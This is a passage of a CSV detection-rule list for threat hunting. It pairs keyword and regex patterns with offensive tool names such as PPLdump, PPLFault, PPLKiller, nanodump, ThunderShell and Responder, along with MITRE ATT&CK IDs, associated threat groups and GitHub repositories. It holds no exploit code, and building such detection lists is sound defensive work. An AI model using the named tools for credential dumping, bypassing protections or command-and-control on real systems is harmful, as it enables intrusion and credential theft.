Access","https://github.com/tastypepperoni/PPLBlade","1","1","N/A","N/A","10","6","545","59","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z","55333" "*ppldump *",".{0,1000}ppldump\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/PPLDump_BOF","1","0","N/A","N/A","10","10","140","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z","55334" "*PPLdump*",".{0,1000}PPLdump.{0,1000}","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland 
exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","1","N/A","N/A","10","9","868","140","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z","55335" "*PPLdump.exe*",".{0,1000}PPLdump\.exe.{0,1000}","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","1","N/A","N/A","10","9","868","140","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z","55336" "*ppldump.py*",".{0,1000}ppldump\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","55337" "*PPLDump_BOF.*",".{0,1000}PPLDump_BOF\..{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - 
Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","N/A","10","10","140","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z","55338" "*ppldump_embedded*",".{0,1000}ppldump_embedded.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","55339" "*PPLdump64.exe*",".{0,1000}PPLdump64\.exe.{0,1000}","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","1","N/A","N/A","10","9","868","140","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z","55340" "*PPLdumpDll*",".{0,1000}PPLdumpDll.{0,1000}","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","1","N/A","N/A","10","9","868","140","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z","55341" "*PPLFault.*",".{0,1000}PPLFault\..{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows 
Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","55342" "*pplfault.cna*",".{0,1000}pplfault\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","N/A","2","140","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z","55343" "*PPLFault.exe*",".{0,1000}PPLFault\.exe.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","55344" 
"*PPLFaultDumpBOF*",".{0,1000}PPLFaultDumpBOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","N/A","2","140","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z","55345" "*PPLFault-Localhost-SMB.ps1*",".{0,1000}PPLFault\-Localhost\-SMB\.ps1.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","55346" "*PPLFault-Patch-Downgrade/Config.xml*",".{0,1000}PPLFault\-Patch\-Downgrade\/Config\.xml.{0,1000}","offensive_tool_keyword","WindowsDowndate","A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities","T1072 - T1486 - T1505.002 - T1495 - T1499.004","TA0005 - TA0004 - TA0003 ","N/A","N/A","Defense 
Evasion","https://github.com/SafeBreach-Labs/WindowsDowndate","1","1","N/A","N/A","10","7","663","88","2024-10-26T10:18:49Z","2024-01-08T19:42:47Z","55347" "*PPLFaultPayload.dll*",".{0,1000}PPLFaultPayload\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","N/A","2","140","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z","55348" "*PPLFaultPayload.dll*",".{0,1000}PPLFaultPayload\.dll.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","55349" "*PPLFaultTemp*",".{0,1000}PPLFaultTemp.{0,1000}","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - 
TA0006","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","N/A","2","140","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z","55350" "*PPLFaultTemp*",".{0,1000}PPLFaultTemp.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","55351" "*PPLKiller.exe*",".{0,1000}PPLKiller\.exe.{0,1000}","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","N/A","10","10","933","139","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z","55352" "*PPLKiller.sln*",".{0,1000}PPLKiller\.sln.{0,1000}","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","N/A","10","10","933","139","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z","55353" "*PPLKiller.vcxproj*",".{0,1000}PPLKiller\.vcxproj.{0,1000}","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","N/A","10","10","933","139","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z","55354" "*PPLKiller-master*",".{0,1000}PPLKiller\-master.{0,1000}","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","N/A","10","10","933","139","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z","55355" "*PPLmedicDll.def*",".{0,1000}PPLmedicDll\.def.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","N/A","8","4","333","36","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z","55356" "*PPLmedicDll.dll*",".{0,1000}PPLmedicDll\.dll.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","1","N/A","N/A","8","4","333","36","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z","55357" "*pplsystem.exe *",".{0,1000}pplsystem\.exe\s.{0,1000}","offensive_tool_keyword","PPLSystem","creates a livedump of the machine through NtDebugSystemControl to extract the COM secret and context, to then inject inside this process.","T1003.002","TA0006","N/A","N/A","Credential 
Access","https://github.com/Slowerzs/PPLSystem","1","0","N/A","N/A","10","2","190","23","2024-05-29T18:33:35Z","2024-05-22T17:48:49Z","55358" "*PppEWCIgXbsepIwnuRIHtQLC*",".{0,1000}PppEWCIgXbsepIwnuRIHtQLC.{0,1000}","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","LockBit","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","N/A","10","10","779","223","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z","55359" "*ppypykatz.py*",".{0,1000}ppypykatz\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","55360" "*ppzmaodrgtg7r6zcputdlaqfliubmmjpo4u56l3ayckut3nyvw6dyayd.onion*",".{0,1000}ppzmaodrgtg7r6zcputdlaqfliubmmjpo4u56l3ayckut3nyvw6dyayd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","55361" "*praetorian.antihacker*",".{0,1000}praetorian\.antihacker.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 
- T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","N/A","10","10","712","111","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z","55362" "*praetorian.com/blog/relaying-to-adfs-attacks/*",".{0,1000}praetorian\.com\/blog\/relaying\-to\-adfs\-attacks\/.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. 
This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","Black Basta","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","1","N/A","N/A","10","2","179","15","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z","55363" "*praetorian-inc/ADFSRelay*",".{0,1000}praetorian\-inc\/ADFSRelay.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","Black Basta","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","1","N/A","N/A","10","2","179","15","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z","55364" "*praetorian-inc/gato*",".{0,1000}praetorian\-inc\/gato.{0,1000}","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","1","N/A","N/A","N/A","7","630","55","2025-04-10T23:25:04Z","2023-01-06T15:43:27Z","55365" "*praetorian-inc/noseyparker*",".{0,1000}praetorian\-inc\/noseyparker.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","N/A","8","10","1903","100","2025-03-07T20:15:34Z","2022-11-08T23:09:17Z","55366" 
"*praetorian-inc/PortBender*",".{0,1000}praetorian\-inc\/PortBender.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","N/A","10","10","712","111","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z","55367" "*Prasadhak.ps1*",".{0,1000}Prasadhak\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","55368" "*pre2k auth * --dc-ip *",".{0,1000}pre2k\sauth\s.{0,1000}\s\-\-dc\-ip\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","55369" "*prepare_ppl_command_line*",".{0,1000}prepare_ppl_command_line.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","55370" "*prepareResponseForHiddenAPICall*",".{0,1000}prepareResponseForHiddenAPICall.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","55371" "*Preparing Windows for Responder...\nDisabling NetBIOS*",".{0,1000}Preparing\sWindows\sfor\sResponder\.\.\.\\nDisabling\sNetBIOS.{0,1000}","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","55372" "*Prepouce/CoercedPotato*",".{0,1000}Prepouce\/CoercedPotato.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","1","N/A","N/A","10","4","366","66","2024-08-26T08:09:00Z","2023-09-11T19:04:29Z","55373" "*Press a key to end PoC?*",".{0,1000}Press\sa\skey\sto\send\sPoC\?.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","0","#content","N/A","9","2","106","17","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z","55374" "*PrimusC2-main.zip*",".{0,1000}PrimusC2\-main\.zip.{0,1000}","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - 